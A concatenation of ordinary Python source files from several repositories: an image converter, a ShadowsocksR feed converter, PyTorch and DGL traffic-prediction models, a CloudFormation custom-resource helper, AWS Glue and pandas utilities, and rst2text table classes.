if is_imperfect_jpeg(file_):
convert_image_file(file_)
converted_num += 1
else:
print(f'{TAB2} Skiped (not imperfect).')
return converted_num
def convert_file(file):
return 1, convert_file_list([file])
def convert_folder(folder):
children = os.listdir(folder)
def join_path(file):
return str(Path(folder) / file)
children = list(map(join_path, children))
return len(children), convert_file_list(children)
def convert_from_input(input_items):
total_num = 0
converted_num = 0
for item in input_items:
print(f'On {item}:')
if os.path.isfile(item):
result = convert_file(item)
total_num += result[0]
converted_num += result[1]
elif os.path.isdir(item):
result = convert_folder(item)
total_num += result[0]
converted_num += result[1]
else:
print(f'{TAB1} Skiped (not file nor folder).')
print('\n')
print('All complete!')
return total_num, converted_num
def main():
if len(sys.argv) <= 1:
print('Please drag files or folders into the icon of this program.')
else:
total, converted = convert_from_input(sys.argv[1:])
msg = f'{converted} of {total} file(s) have been converted!'
print(msg)
input()
main()
```
#### File: 1ocalhost/py_cheat/ssr_feed_cvt.py
```python
import base64
import re
import time
import datetime
import socket
import functools
import requests
import urllib.parse as uparse
import copy
def my_b64_decode(data):
d = data.replace('_', '/').replace('-', '+')
return base64.b64decode(d.strip() + '==').decode("utf-8")
def my_b64_url_encode(s):
return base64.urlsafe_b64encode(s.encode('utf-8')).decode('utf-8')
def b64_encode_param(s):
return my_b64_url_encode(s).replace('=', '')
def my_split_no_empty(obj, sep):
return list(filter(len, obj.split(sep)))
def parse_proxy_item(uri):
ssr_scheme = 'ssr://'
uri_b64 = my_split_no_empty(uri, ssr_scheme)[0]
conf = re.split('/', my_b64_decode(uri_b64))
ss_conf = conf[0]
ssr_conf = conf[1]
ss_part = ss_conf.split(':', 1)
ssr_part = uparse.parse_qsl(uparse.urlsplit(ssr_conf).query)
return ss_part, dict(ssr_part)
class ProxyItemParser:
def __init__(self):
self.server = ''
self.server_ip = ''
def replace_server(self, host):
self.server = host
try:
ip = socket.gethostbyname(host)
self.server_ip = ip
return ip
except socket.gaierror:
return server
def replace_remark(self):
def replace():
if not self.server_ip:
return self.server + '(DNS)'
url = 'https://freeapi.ipip.net/' + self.server_ip
print(url)
try:
r = requests.get(url)
time.sleep(0.5)
except requests.exceptions.RequestException:
return self.server_ip + '(GET)'
if r.status_code != 200:
return self.server_ip + '(API)'
j = r.json()
item = j[0]
if j[1] and j[1] != j[0]:
item += ','
item += j[1]
if j[4]:
item += ','
item += j[4].split('/')[0]
return item
return b64_encode_param(replace())
def item_conv_impl(group, item):
parser = ProxyItemParser()
server_host = parser.replace_server(item[0][0])
item[1]['remarks'] = parser.replace_remark()
item[1]['group'] = group
return [server_host + ':' + item[0][1], item[1]]
def parse_feed_item(feed, group_name):
all_lines = my_split_no_empty(my_b64_decode(feed), '\n')
proxy_items = list(map(parse_proxy_item, all_lines))
proxy_items = {a[0]: (a, b) for a, b in proxy_items[2:]}
proxy_items = [v for k, v in proxy_items.items()]
group = b64_encode_param(group_name)
item_conv = functools.partial(item_conv_impl, group)
return list(map(item_conv, proxy_items))
def encode_feed_item(items, info):
def encode_proxy_item(item):
raw_data = item[0] + '/?' + uparse.urlencode(item[1])
return 'ssr://' + my_b64_url_encode(raw_data)
items.sort(key=lambda x: x[1]['remarks'])
items = list(map(encode_proxy_item, info + items))
new_feed_raw = '\n'.join(items)
return my_b64_url_encode(new_feed_raw)
def convert_feed(url, group_name):
try:
r = requests.get(url)
except requests.exceptions.RequestException:
print('Failed to connect to server')
return None
if r.status_code != 200:
print('Invalid status code')
return None
items = parse_feed_item(r.text, group_name)
info_time = copy.deepcopy(items[0])
now = re.sub(r'\.\d+', '', f'{datetime.datetime.now()}')
info_time[1]['remarks'] = b64_encode_param('Update: ' + now)
info_time[0] = re.sub('^[^:]+', 'google.com', info_time[0])
return encode_feed_item(items, [info_time])
# Usage:
# convert_feed('https://example.com/feed.txt', 'GroupName')
``` |
{
"source": "1ofsomepeople/flask-learn",
"score": 3
} |
#### File: 1ofsomepeople/flask-learn/png2json.py
```python
import os
import sys
import lnglat_mercator_tiles_convertor as convertor
import json
def readpoints():
pointsFile = './points.json'
data = []
tilePoint = {}
with open(pointsFile, 'r') as f:
data = json.load(f).get('wgs84points')
# print('readpoints'+ str(len(data)))
for point in data:
# point[0] = round(point[0],6)
# point[1] = round(point[1],6)
lng_BD09,lat_BD09 = convertor.wgs84_to_bd09(point[0], point[1])
pointX,pointY = convertor.BD092mercotor(lng_BD09,lat_BD09)
tileX,tileY,pixelX,pixelY = convertor.point2tiles_pixel(pointX,pointY,14)
tileName = str(tileX)+str(tileY)
if(tileName in tilePoint.keys()):
tilePoint[tileName].append([pixelX,pixelY,point[0],point[1]])
else:
tilePoint[tileName] = []
tilePoint[tileName].append([pixelX,pixelY,point[0],point[1]])
return tilePoint
def rgb2hsv(rgb):
r, g, b = rgb[0], rgb[1], rgb[2]
m_x = max(r, g, b)
m_n = min(r, g, b)
m = m_x - m_n
if m_x == m_n:
h = 0
elif m_x == r:
if g >= b:
h = ((g - b) / m) * 60
else:
h = ((g - b) / m) * 60 + 360
elif m_x == g:
h = ((b - r) / m) * 60 + 120
elif m_x == b:
h = ((r - g) / m) * 60 + 240
if m_x == 0:
s = 0
else:
s = m / m_x
v = m_x
H = h / 2
S = s * 255.0
V = v * 255.0
return int(round(H)), int(round(S)), int(round(V))
def hsv2value(hsv):
h, s, v = hsv[0], hsv[1], hsv[2]
if 35 <= h <= 99 and 43 <= s <= 255 and 46 <= v <= 255: # green
return 3
elif 0 <= h <= 10 and 43 <= s <= 255 and 46 <= v <= 255: # red
return 10
elif 11 <= h <= 34 and 43 <= s <= 255 and 46 <= v <= 255: # yellow
return 7
elif 0 <= s <= 43 and 46 <= v <= 255: # white and gray
return 1
else: # black
return 0
# 将RGB颜色映射到值 灰度化 交通中红色绿色蓝色代表的值不一样权重应该不同
def RGB2Value(R,G,B):
# 灰度值的加权平均法Gray = 0.299*R + 0.578*G + 0.114*B
# weight = [0.600,0.100,0.300]
# value = weight[0]*R + weight[1]*G + weight[2]*B
# value = round(R,6)
H,S,V = rgb2hsv([R,G,B])
value = hsv2value([H,S,V])
return value
```
#### File: flask-learn/pred_model/lr_online_test.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
# from transform_dataset import TrafficData
import random
import numpy as np
import pandas as pd
import os
class OneHotProcess(nn.Module):
def __init__(self, in_dim, hid_c):
super(OneHotProcess, self).__init__()
# print(in_dim, hid_c) # 3 12
self.embedding = nn.Embedding(in_dim, hid_c)
def forward(self, source):
source = source // 20 - 1
# print("source",source)
source = self.embedding(source)
# print("source after embeding",source)
return source
class LinearRegression(nn.Module):
def __init__(self, in_dim, hid_c, src_len):
# in_dim, hid_c, src_len 3,12,12
super(LinearRegression, self).__init__()
self.oneHotEmbed = OneHotProcess(in_dim, hid_c)
self.linear = nn.Linear(src_len * hid_c, in_dim)
def forward(self, input_data, device):
source = input_data.to(device) # [B, N, src_len]
input_feature = self.oneHotEmbed(source) # [B, N, src_len, hid_dim]
# print("input_feature",input_feature)
B, N, src_len, hid_c = input_feature.size() # 1 17531 12 12
input_feature = input_feature.view(B, N, -1) # [B, N, src_len * hid_dim]
out_feature = F.relu(self.linear(input_feature)) # [B, N, in_dim]
predict = F.softmax(out_feature, dim=-1)
return predict # [B, N, in_dim]
def test(test_data):
"""
test_data: [B, N, src_len] 20, 40, 60
prediction: [B, N, in_dim]
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
file_name = "lr.pkl"
path=os.path.abspath('.') #表示执行环境的绝对路径
if(os.path.split(path)[-1] == 'pred_model'):
file_name = os.path.join(path,'lr.pkl')
elif(os.path.split(path)[-1] == 'flask-learn'):
file_name = os.path.join(path,'pred_model','lr.pkl')
checkpoint = torch.load(file_name, device)
model_para = checkpoint["model"]
option = checkpoint["setting"]
cudnn.benchmark = True
# print("option.hid_c:", option.hid_c) # 12
# print("option.h_step:", option.h_step) # 12
model = LinearRegression(3, option.hid_c, option.h_step) # 3,12,12
model.load_state_dict(model_para)
model = model.to(device)
# 计算模型参数数量
total = sum([param.nelement() for param in model.parameters()])
print("Number of parameter: %.2f" % (total)) # Number of parameter: 471.00
prediction = model(test_data, device)
return prediction
# if __name__ == '__main__':
# test_set = TrafficData(folder="data", train_ratio=0.6, valid_ratio=0.2, data_type="test", h_step=12, f_step=1)
# test_data = torch.cat((test_set[0]["x"].unsqueeze(0), test_set[1]["x"].unsqueeze(0)), dim=0)
# prediction = test(test_data)
# print(prediction.size())
def mockData():
# 生成17531*12的二维数组
timeData = [[random.randrange(20,61,20) for col in range(12)] for row in range(17531)]
# 对数据维度进行扩充。给指定位置加上维数为一的维度,比如原本有个三行的数据(3),unsqueeze(0)后就会在0的位置加了一维就变成一行三列(1,3)
tensorData = torch.Tensor(timeData).unsqueeze(0).long()
# print(tensorData.size()) # torch.Size([1, 17531, 12])
# print(tensorData.type()) # torch.LongTensor
return tensorData
# 加载用于模型预测的数据
def loadDataForPred():
# 读csv,生成dataFrame
readCsv = pd.read_csv('../data.csv')
# 经纬度的pointindex数组
pointsIndex = np.array(readCsv.values)[:,0].tolist()
dataForPred = np.array(readCsv.values)[:,-12:].tolist()
tensorData = torch.Tensor(dataForPred).unsqueeze(0).long()
print(tensorData.size())
print(tensorData.type())
return tensorData
if __name__ == '__main__':
# tensorData = loadDataForPred()
tensorData = mockData()
prediction = test(tensorData)
# print("prediction.size():",prediction.size())
# resultIndexList = torch.max(prediction[0],1)[1].numpy().tolist()
# for i in range(len(resultIndexList)):
# resultIndexList[i] = 20 + resultIndexList[i]*20
# print("resultIndexList",resultIndexList)
```
#### File: pred_model/sourceCode/model.py
```python
import dgl
import torch
import torch.nn as nn
import torch.nn.functional as F
from graph import GraphModel, SGModel, SAGEModel
class OneHotProcess(nn.Module):
def __init__(self, in_dim, hid_c):
super(OneHotProcess, self).__init__()
self.embedding = nn.Embedding(in_dim, hid_c)
def forward(self, source, target):
source = source // 20 - 1
target = target // 20 - 1
source = self.embedding(source)
return source, target
class PredictModel(nn.Module):
def __init__(self, keyword, src_id, dst_id, in_dim, hid_c, src_len, n_layers, device):
super(PredictModel, self).__init__()
self.oneHotEmbed = OneHotProcess(in_dim, hid_c)
if keyword == "Graph":
self.model = GraphModel(src_id, dst_id, src_len * hid_c, src_len * hid_c, device)
elif keyword == "SG":
self.model = SGModel(src_id, dst_id, src_len * hid_c, src_len * hid_c, n_layers, device)
elif keyword == "SAGE":
self.model = SAGEModel(src_id, dst_id, src_len * hid_c, src_len * hid_c, n_layers, device)
else:
raise KeyError("Keyword is not defined! ")
self.linear = nn.Linear(src_len * hid_c, in_dim)
def forward(self, input_data, device, **kwargs):
source = input_data["x"].to(device) # [B, N, src_len]
target = input_data["y"].to(device)[:, :, 0] # [B, N]
# target = input_data["y"].to(device) # [B, N]
input_feature, target = self.oneHotEmbed(source, target)
B, N, src_len, hid_c = input_feature.size()
input_feature = input_feature.view(B, N, -1).permute(1, 0, 2) # [N, B, src_len * hid_c]
output_feature = self.model(input_feature) # [N, B, hid_c]
output_feature = self.linear(output_feature) # [N, B, in_dim]
predict = F.softmax(output_feature, dim=-1).permute(1, 0, 2) # [B, N, in_dim]
predict = predict.reshape(B * N, -1)
target = target.reshape(-1)
return predict, target
class LinearRegression(nn.Module):
def __init__(self, in_dim, hid_c, src_len):
super(LinearRegression, self).__init__()
self.oneHotEmbed = OneHotProcess(in_dim, hid_c)
self.linear = nn.Linear(src_len * hid_c, in_dim)
def forward(self, input_data, device, **kwargs):
source = input_data["x"].to(device) # [B, N, src_len]
target = input_data["y"].to(device)[:, :, 0] # [B, N]
input_feature, target = self.oneHotEmbed(source, target) # [B, N, src_len, hid_dim]
B, N, src_len, hid_c = input_feature.size()
input_feature = input_feature.view(B, N, -1) # [B, N, src_len * hid_dim]
out_feature = F.relu(self.linear(input_feature)) # [B, N, in_dim]
predict = F.softmax(out_feature, dim=-1)
predict = predict.reshape(B * N, -1)
target = target.reshape(-1)
return predict, target
class NormalizeLR(nn.Module):
def __init__(self, in_dim, hid_c, src_len):
super(NormalizeLR, self).__init__()
self.oneHotEmbed = OneHotProcess(in_dim, hid_c)
self.linear = nn.Linear(src_len * hid_c, in_dim)
self.norm = nn.BatchNorm1d(in_dim)
def forward(self, input_data, device, **kwargs):
source = input_data["x"].to(device) # [B, N, src_len]
target = input_data["y"].to(device)[:, :, 0] # [B, N]
input_feature, target = self.oneHotEmbed(source, target) # [B, N, src_len, hid_dim]
B, N, src_len, hid_c = input_feature.size()
input_feature = input_feature.view(B, N, -1) # [B, N, src_len * hid_dim]
out_feature = self.norm(self.linear(input_feature).permute(0, 2, 1)) # [B, N, in_dim]
out_feature = F.relu(out_feature.permute(0, 1, 2))
predict = F.softmax(out_feature, dim=-1)
predict = predict.reshape(B * N, -1)
target = target.reshape(-1)
return predict, target
if __name__ == '__main__':
input_data = {"x": torch.LongTensor([[20, 40, 60, 20, 20, 40],
[20, 40, 60, 20, 20, 40],
[20, 40, 60, 20, 20, 40]]).unsqueeze(0), # [1, 3, 6] B, N, T
"y": torch.LongTensor([[20, 40, 60, 20, 20, 40],
[20, 40, 60, 20, 20, 40],
[20, 40, 60, 20, 20, 40]]).unsqueeze(0)} # [1, 3, 6] B, N, T
# print(input_data)
model = PredictModel(keyword="SAGE",
src_id=[0, 1, 2], dst_id=[1, 2, 0],
in_dim=3, hid_c=12, src_len=6, n_layers=2, device=torch.device("cpu"))
result = model(input_data, torch.device("cpu"))
print(result[0].size())
print(result[1].size())
```
#### File: pred_model/sourceCode/sage_online_test.py
```python
import dgl
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import dgl.nn as gnn
# from transform_dataset import TrafficData
def load_graph():
graph_data = np.load("graph.npz")
src_id = graph_data["src_id"]
dst_id = graph_data["dst_id"]
return list(src_id), list(dst_id)
class OneHotProcess(nn.Module):
def __init__(self, in_dim, hid_c):
super(OneHotProcess, self).__init__()
self.embedding = nn.Embedding(in_dim, hid_c)
def forward(self, source):
source = source // 20 - 1
source = self.embedding(source)
return source
class SAGEModel(nn.Module):
def __init__(self, src_id, dst_id, in_c, hid_c, n_layers, device):
super(SAGEModel, self).__init__()
self.graph = dgl.graph((src_id, dst_id), device=device)
self.gcn = nn.ModuleList([gnn.SAGEConv(in_c if i == 0 else hid_c, hid_c, "pool") for i in range(n_layers)])
self.residual = nn.ModuleList([nn.Identity() if i != 0 else nn.Linear(in_c, hid_c) for i in range(n_layers)])
def forward(self, features):
input_features = features
for i, conv in enumerate(self.gcn):
output_features = F.relu(conv(self.graph, input_features)) + self.residual[i](input_features)
input_features = output_features
return input_features
class PredictModel(nn.Module):
def __init__(self, keyword, src_id, dst_id, in_dim, hid_c, src_len, n_layers, device):
super(PredictModel, self).__init__()
self.oneHotEmbed = OneHotProcess(in_dim, hid_c)
if keyword == "SAGE":
self.model = SAGEModel(src_id, dst_id, src_len * hid_c, src_len * hid_c, n_layers, device)
else:
raise KeyError("Keyword is not defined! ")
self.linear = nn.Linear(src_len * hid_c, in_dim)
def forward(self, input_data, device):
source = input_data.to(device) # [B, N, src_len]
input_feature = self.oneHotEmbed(source)
B, N, src_len, hid_c = input_feature.size()
input_feature = input_feature.view(B, N, -1).permute(1, 0, 2) # [N, B, src_len * hid_c]
output_feature = self.model(input_feature) # [N, B, hid_c]
output_feature = self.linear(output_feature) # [N, B, in_dim]
predict = F.softmax(output_feature, dim=-1).permute(1, 0, 2) # [B, N, in_dim]
return predict
def test(test_data):
"""
test_data: [B, N, src_len] 20, 40, 60
prediction: [B, N, in_dim]
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
file_name = "sage.pkl"
checkpoint = torch.load(file_name, map_location=device)
model_para = checkpoint["model"]
option = checkpoint["setting"]
cudnn.benchmark = True
src_id, dst_id = load_graph()
model = PredictModel(option.model, src_id, dst_id, 3, option.hid_c, option.h_step, option.n_layer, device)
model.load_state_dict(model_para)
model = model.to(device)
prediction = model(test_data, device)
return prediction
# if __name__ == '__main__':
# test_set = TrafficData(folder="data", train_ratio=0.6, valid_ratio=0.2, data_type="test", h_step=12, f_step=1)
# test_data = torch.cat((test_set[0]["x"].unsqueeze(0), test_set[1]["x"].unsqueeze(0)), dim=0)
# prediction = test(test_data)
# print(prediction.size())
``` |
{
"source": "1oglop1/aws-cloudformation-templates",
"score": 2
} |
#### File: custom_resources/python_custom_resource_helper/crhelper.py
```python
Create resource.\"""
physical_resource_id = context.log_stream_name
return physical_resource_id, {"Some": "Data"}
def update(event, context)
\"""Update resource.\"""
physical_resource_id = event['PhysicalResourceId']
return physical_resource_id, {}
def delete(event):
\"""Delete resource.\"""
return event['PhysicalResourceId']
def lambda_handler(event, context):
cfn_handler(event, context, create, update, delete)
"""
import json
import logging
import threading
from botocore.vendored import requests
LOGGER = logging.getLogger(__name__)
LOGGER.addHandler(logging.NullHandler())
SUCCESS = "SUCCESS"
FAILED = "FAILED"
def send_cfn(event, context, response_status, response_data, reason=None, physical_resource_id=None):
"""
Send a resource manipulation status response to CloudFormation
Modified from:
https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-lambda-function-code.html
"""
default_reason = (
f"See the details in CloudWatch Log group {context.log_group_name} "
f"Stream: {context.log_stream_name}"
)
response_body = json.dumps(
{
"Status": response_status,
"Reason": str(reason) + f".. {default_reason}" if reason else default_reason,
"PhysicalResourceId": physical_resource_id or context.log_stream_name,
"StackId": event["StackId"],
"RequestId": event["RequestId"],
"LogicalResourceId": event["LogicalResourceId"],
"Data": response_data,
}
)
LOGGER.info(f"ResponseURL: {event['ResponseURL']}", )
LOGGER.info(f"ResponseBody: {response_body}")
headers = {"Content-Type": "", "Content-Length": str(len(response_body))}
response = requests.put(event["ResponseURL"], data=response_body, headers=headers)
try:
response.raise_for_status()
LOGGER.info(f"Status code: {response.reason}")
except requests.HTTPError:
LOGGER.exception(f"Failed to send CFN response. {response.text}")
raise
def lambda_timeout(event, context):
"""Send error to CFN if Lambda runs ouf of time."""
msg = "Execution is about to time out, sending failure message"
LOGGER.error(msg)
send_cfn(event, context, FAILED, {}, reason=msg)
raise Exception(msg)
def cfn_handler(event, context, create, update, delete):
"""
Handle CFN events.
This function executes methods for custom resource creation and send response to CloudFormation API.
Parameters
----------
event
AWS Lambda event (request from CFN)
context
AWS Lambda context
create: function
Create(request) custom resource function.
update
Update custom resource function.
delete
Delete custom resource function.
"""
# Set timer to expire slightly sooner so we have time to notify CFN.
timeout_timer = threading.Timer(
(context.get_remaining_time_in_millis() / 1000.00) - 0.5,
lambda_timeout,
args=[event, context],
)
timeout_timer.start()
try:
# Execute custom resource handlers
LOGGER.info("Received a {} Request".format(event["RequestType"]))
if event["RequestType"] == "Create":
physical_resource_id, response_data = execute_handler(event, context, create)
elif event["RequestType"] == "Update":
physical_resource_id, response_data = execute_handler(event, context, update)
elif event["RequestType"] == "Delete":
delete(event, context)
physical_resource_id = event['PhysicalResourceId']
response_data = None
else:
msg = f"Unsupported RequestType: {event['RequestType']}"
send_cfn(event, context, FAILED, None, msg)
raise TypeError(msg)
send_cfn(event, context, SUCCESS, response_data, physical_resource_id=physical_resource_id)
# Safety switch - Catch any exceptions, log the stacktrace, send a failure back to
# CloudFormation and then raise an exception
except Exception as exc:
LOGGER.error(exc, exc_info=True)
send_cfn(
event,
context,
FAILED,
None,
reason=f"{exc.__class__.__name__}: {exc}",
)
raise
finally:
# Stop the before next lambda invocation.
timeout_timer.cancel()
def execute_handler(event, context, handler):
"""
Execute handlers: Create, Update and check their response.
Parameters
----------
event
AWS Lambda event.
context
AWS Lambda context.
handler: function
Functions Create or Update
Returns
-------
tuple
Verified response.
"""
response = handler(event, context)
if not isinstance(response, tuple) or len(response) != 2:
raise TypeError(f"Return type of {handler.__name__} must be tuple(PhysicalResourceId, Data).")
if not isinstance(response[0], str):
raise ValueError(f"PhysicalResourceId is not string, but {handler.__name__} returned {type(response[0])}.")
if not isinstance(response[1], dict) or response[1] is None:
raise TypeError(f"Data is not dictionary, but {handler.__name__} returned {type(response[1])}.")
return response
``` |
{
"source": "1oglop1/aws-glue-monorepo-style",
"score": 3
} |
#### File: ds1/raw_to_refined/raw_to_refined.py
```python
import logging
import pandas as pd
from glue_shared.pandas_helpers import write_parquet
LOGGER = logging.getLogger("job")
def main():
LOGGER.info("JOB_NAME: %s", JOB_CONFIG["JOB_NAME"])
LOGGER.info("JOB_ID: %s", JOB_CONFIG["JOB_ID"])
LOGGER.info("JOB_RUN_ID %s", JOB_CONFIG["JOB_RUN_ID"])
LOGGER.info("WORKFLOW_NAME: %s", JOB_CONFIG["WORKFLOW_NAME"])
LOGGER.info("WORKFLOW_RUN_ID %s", JOB_CONFIG["WORKFLOW_RUN_ID"])
data_src = f"s3://{JOB_CONFIG['S3_BUCKET']}/{JOB_CONFIG['s3_raw_prefix']}/cereal.csv"
LOGGER.info("Reading raw data from %s", data_src)
df = pd.read_csv(data_src, sep=";")
LOGGER.info("DF shape %s", df.shape)
write_parquet(df, f"s3://{JOB_CONFIG['S3_BUCKET']}/{JOB_CONFIG['s3_refined_prefix']}")
if __name__ == "__main__":
from config import JOB_CONFIG
main()
```
#### File: src/glue_shared/glue_interface.py
```python
import logging
from typing import List, Dict, Sequence, Iterable
LOGGER = logging.getLogger(__name__)
def get_glue_args(arguments: Sequence, options: List[str] = None) -> Dict:
"""
Parse Arguments supplied to the Job.
Parameters
----------
arguments
Sequence of options and values to be parsed. (sys.argv)
options
Options which value is resolved.
Returns
-------
Parsed options and values.
"""
LOGGER.debug("Parsing arguments for PySpark job")
from awsglue.utils import getResolvedOptions
LOGGER.debug("Parsing arguments: %s options: %s", arguments, options)
if not options:
return getResolvedOptions(args=arguments, options=["JOB_NAME"])
return getResolvedOptions(arguments, options=["JOB_NAME"] + options)
def get_spark_session_and_glue_job(
glue_args: Dict,
conf=None,
py_files: Iterable[str] = None,
extra_jars: List[str] = None,
):
"""
Get spark session and AWS glue job.
Parameters
----------
glue_args
Dictionary of Argument Name: Argument value
extra_jars
Path to dependent jar files
conf : Union[pyspark.SparkConf, Dict[str, str]]
Spark config, either object or dictionary of config options.
py_files
Paths to python files (.py, .zip, .egg)
Returns
-------
pyspark.sql.SparkSession, awsglue.job.Job
"""
from awsglue.context import GlueContext
from awsglue.job import Job
from pyspark import SparkContext, SparkConf
LOGGER.debug("Creating spark session with parameters")
LOGGER.debug("conf=%s", conf)
LOGGER.debug("py_files=%s", py_files)
LOGGER.debug("extra_jars=%s", extra_jars)
if isinstance(conf, dict):
spark_conf = SparkConf()
spark_conf.setAll(conf.items())
elif isinstance(conf, SparkConf):
spark_conf = conf
else:
spark_conf = None
if extra_jars and spark_conf:
spark_dependencies = ",".join(extra_jars)
spark_conf.set("spark.jars.packages", spark_dependencies)
sc = SparkContext.getOrCreate(conf=spark_conf)
if py_files:
LOGGER.debug("Adding PYFILEs: %s", py_files)
for py_file in py_files:
sc.addPyFile(py_file)
glue_context = GlueContext(sparkContext=sc)
job = Job(glue_context=glue_context)
job.init(glue_args["JOB_NAME"], glue_args)
# .py, .zip or .egg
return glue_context.spark_session, job
def commit_job(job):
"""Commit AWS glue job."""
job.commit()
```
#### File: src/glue_shared/helpers.py
```python
import os
import re
from functools import partial
from itertools import islice
from typing import Tuple
EXTENSIONS = re.compile(r".+py$|.+zip$|.+egg$")
def take(n, iterable):
"""
Return first n items of the iterable as a list
Notes
-----
From itertools recipes:
https://docs.python.org/3.6/library/itertools.html#itertools-recipes
"""
return list(islice(iterable, n))
def chunked(iterable, n):
"""Break *iterable* into lists of length *n*:
>>> list(chunked([1, 2, 3, 4, 5, 6], 3))
[[1, 2, 3], [4, 5, 6]]
If the length of *iterable* is not evenly divisible by *n*, the last
returned list will be shorter:
>>> list(chunked([1, 2, 3, 4, 5, 6, 7, 8], 3))
[[1, 2, 3], [4, 5, 6], [7, 8]]
To use a fill-in value instead, see the :func:`grouper` recipe.
:func:`chunked` is useful for splitting up a computation on a large number
of keys into batches, to be pickled and sent off to worker processes. One
example is operations on rows in MySQL, which does not implement
server-side cursors properly and would otherwise load the entire dataset
into RAM on the client.
Notes
-----
Reimplemented from more itertools to avoid the installation of the package.
https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.chunked
"""
return iter(partial(take, n, iter(iterable)), [])
def get_py_zip_egg_files(path: str) -> Tuple[str, ...]:
"""
Find all .py, .zip, .egg files in sys.path.
This method is a workaround needed for Glue2.0 as of 2020-05-11
"""
return tuple(e.path for e in filter(lambda ent: EXTENSIONS.match(ent.name), os.scandir(path)))
```
#### File: src/glue_shared/pandas_helpers.py
```python
import logging
from typing import List
import pandas as pd
from glue_shared.boto3_helpers import get_s3_keys
LOGGER = logging.getLogger(__name__)
def write_parquet(
df: pd.DataFrame,
s3_folder_url: str,
partition_cols: List[str] = None,
compression: str = None,
):
"""
Write Parquet file to S3 folder.
Parameters
----------
df
Pandas dataframe
s3_folder_url
S3 url: s3://<bucket>/<prefix>.
partition_cols
Partition path by columns
compression
Parquet compression. Default is "snappy"
"""
import pyarrow as pa
import pyarrow.parquet as pq
import s3fs
LOGGER.info("Writing parquet file to S3: %s", f"{s3_folder_url}")
table = pa.Table.from_pandas(df, preserve_index=False)
pq.write_to_dataset(
table,
s3_folder_url,
filesystem=s3fs.S3FileSystem(),
partition_cols=partition_cols,
compression=compression or "snappy",
)
def df_from_s3_json(
s3_client,
bucket_name: str,
prefix: str,
compression: str = None,
lines: bool = True,
):
"""
Create Pandas DataFrame from multiple files in S3 prefix.
Parameters
----------
s3_client
boto3.client('s3')
bucket_name
prefix
compression
Json file compression.
lines
Multiple JSON objects per line.
Returns
-------
pd.DataFrame
Dataframe containing data under S3 prefix.
"""
df_merged = pd.DataFrame()
for key in get_s3_keys(s3_client, bucket_name, prefix):
resp = s3_client.get_object(Bucket=bucket_name, Key=key)
df = pd.read_json(resp["Body"], orient="records", lines=lines, compression=compression)
df_merged = df_merged.append(df, ignore_index=True)
return df_merged
```
#### File: glue_shared_lib/tests/test_helpers.py
```python
def test_chunked():
from glue_shared.helpers import chunked
l1 = [x for x in range(10)]
l2 = [x for x in range(12)]
assert tuple(chunked(l1, 3)) == ([0, 1, 2], [3, 4, 5], [6, 7, 8], [9])
assert tuple(chunked(l1, 5)) == ([0, 1, 2, 3, 4], [5, 6, 7, 8, 9])
assert tuple(chunked(l1, 10)) == ([0, 1, 2, 3, 4, 5, 6, 7, 8, 9],)
assert tuple(chunked(l2, 3)) == ([0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10, 11])
assert tuple(chunked(l2, 10)) == ([0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11])
``` |
{
"source": "1oglop1/rst2text",
"score": 3
} |
#### File: src/rst2text/elements.py
```python
import math
import re
import textwrap
from itertools import chain, groupby
from typing import cast
from docutils import writers
from docutils.utils import column_width
from rst2text import MAXWIDTH
class Cell:
"""Represents a cell in a table.
It can span on multiple columns or on multiple lines.
"""
def __init__(self, text="", rowspan=1, colspan=1):
self.text = text
self.wrapped = [] # type: List[str]
self.rowspan = rowspan
self.colspan = colspan
self.col = None
self.row = None
def __repr__(self):
return "<Cell {!r} {}v{}/{}>{}>".format(
self.text, self.row, self.rowspan, self.col, self.colspan
)
def __hash__(self):
return hash((self.col, self.row))
def wrap(self, width):
self.wrapped = my_wrap(self.text, width)
class Table:
"""Represents a table, handling cells that can span on multiple lines
or rows, like::
+-----------+-----+
| AAA | BBB |
+-----+-----+ |
| | XXX | |
| +-----+-----+
| DDD | CCC |
+-----+-----------+
This class can be used in two ways:
- Either with absolute positions: call ``table[line, col] = Cell(...)``,
this overwrite an existing cell if any.
- Either with relative positions: call the ``add_row()`` and
``add_cell(Cell(...))`` as needed.
Cell spanning on multiple rows or multiple columns (having a
colspan or rowspan greater than one) are automatically referenced
by all the table cells they covers. This is a usefull
representation as we can simply check ``if self[x, y] is self[x,
y+1]`` to recognize a rowspan.
Colwidth is not automatically computed, it has to be given, either
at construction time, either during the table construction.
Example usage::
table = Table([6, 6])
table.add_cell(Cell("foo"))
table.add_cell(Cell("bar"))
table.set_separator()
table.add_row()
table.add_cell(Cell("FOO"))
table.add_cell(Cell("BAR"))
print(table)
+--------+--------+
| foo | bar |
|========|========|
| FOO | BAR |
+--------+--------+
"""
def __init__(self, colwidth=None):
self.lines = [] # type: List[List[Cell]]
self.separator = 0
self.colwidth = colwidth if colwidth is not None else [] # type: List[int]
self.current_line = 0
self.current_col = 0
def add_row(self):
"""Add a row to the table, to use with ``add_cell()``. It is not needed
to call ``add_row()`` before the first ``add_cell()``.
"""
self.current_line += 1
self.current_col = 0
def set_separator(self):
"""Sets the separator below the current line.
"""
self.separator = len(self.lines)
def add_cell(self, cell):
"""Add a cell to the current line, to use with ``add_row()``. To add
a cell spanning on multiple lines or rows, simply set the
``cell.colspan`` or ``cell.rowspan`` BEFORE inserting it to
the table.
"""
while self[self.current_line, self.current_col]:
self.current_col += 1
self[self.current_line, self.current_col] = cell
self.current_col += cell.colspan
def __getitem__(self, pos):
line, col = pos
self._ensure_has_line(line + 1)
self._ensure_has_column(col + 1)
return self.lines[line][col]
def __setitem__(self, pos, cell):
line, col = pos
self._ensure_has_line(line + cell.rowspan)
self._ensure_has_column(col + cell.colspan)
for dline in range(cell.rowspan):
for dcol in range(cell.colspan):
self.lines[line + dline][col + dcol] = cell
cell.row = line
cell.col = col
def _ensure_has_line(self, line):
while len(self.lines) < line:
self.lines.append([])
def _ensure_has_column(self, col):
for line in self.lines:
while len(line) < col:
line.append(None)
def __repr__(self):
return "\n".join(repr(line) for line in self.lines)
def cell_width(self, cell, source):
"""Give the cell width, according to the given source (either
``self.colwidth`` or ``self.measured_widths``).
